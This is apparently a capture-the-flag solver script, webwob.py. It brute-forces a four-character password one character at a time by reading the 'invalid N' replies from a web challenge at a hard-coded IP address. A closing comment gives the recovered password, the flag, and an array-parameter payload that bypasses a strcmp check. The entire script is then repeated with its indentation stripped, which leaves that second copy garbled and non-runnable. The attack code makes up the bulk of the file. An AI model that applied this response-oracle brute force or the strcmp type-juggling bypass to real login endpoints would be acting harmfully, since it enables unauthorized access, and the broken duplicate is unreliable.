tunelko/webwob.py

## webwob.py
#!/usr/bin/env python
import requests
import string
import re

alpha=string.ascii_uppercase+string.ascii_lowercase+string.digits
url='http://128.199.96.39/?password='
m = re.compile('invalid [0-9]')
password = ['a']*4

def send_request(password):
	r = requests.get(url+password)
	print url+password
	return m.findall(r.text)[0]

for i in range(0,4):
	char = ""
	index = 0
	for j in alpha:
		tmp_pass = password
		tmp_pass[i] = j
		f = send_request("".join(tmp_pass))
		print f
		if 'invalid 1' in f and i==0:
			index = i
			char = j
			print char
			break
		if 'invalid 2' in f and i==1:
			index = i
			char = j
			print char
			break
		if 'invalid 3' in f and i==2:
			index = i
			char = j
			print char
			break
'''
==
http://128.199.96.39/?password=Ungu
The Flag is: flag{AVariant_Of_Strcmp}
==
Intended solution:
http://128.199.96.39/?password[][]=1&password[][]=1&password[][]=1&password[][]=1
'''
	#!/usr/bin/env python
	import requests
	import string
	import re

	alpha=string.ascii_uppercase+string.ascii_lowercase+string.digits
	url='http://128.199.96.39/?password='
	m = re.compile('invalid [0-9]')
	password = ['a']*4

	def send_request(password):
	r = requests.get(url+password)
	print url+password
	return m.findall(r.text)[0]

	for i in range(0,4):
	char = ""
	index = 0
	for j in alpha:
	tmp_pass = password
	tmp_pass[i] = j
	f = send_request("".join(tmp_pass))
	print f
	if 'invalid 1' in f and i==0:
	index = i
	char = j
	print char
	break
	if 'invalid 2' in f and i==1:
	index = i
	char = j
	print char
	break
	if 'invalid 3' in f and i==2:
	index = i
	char = j
	print char
	break
	'''
	==
	http://128.199.96.39/?password=Ungu
	The Flag is: flag{AVariant_Of_Strcmp}
	==
	Intended solution:
	http://128.199.96.39/?password[][]=1&password[][]=1&password[][]=1&password[][]=1
	'''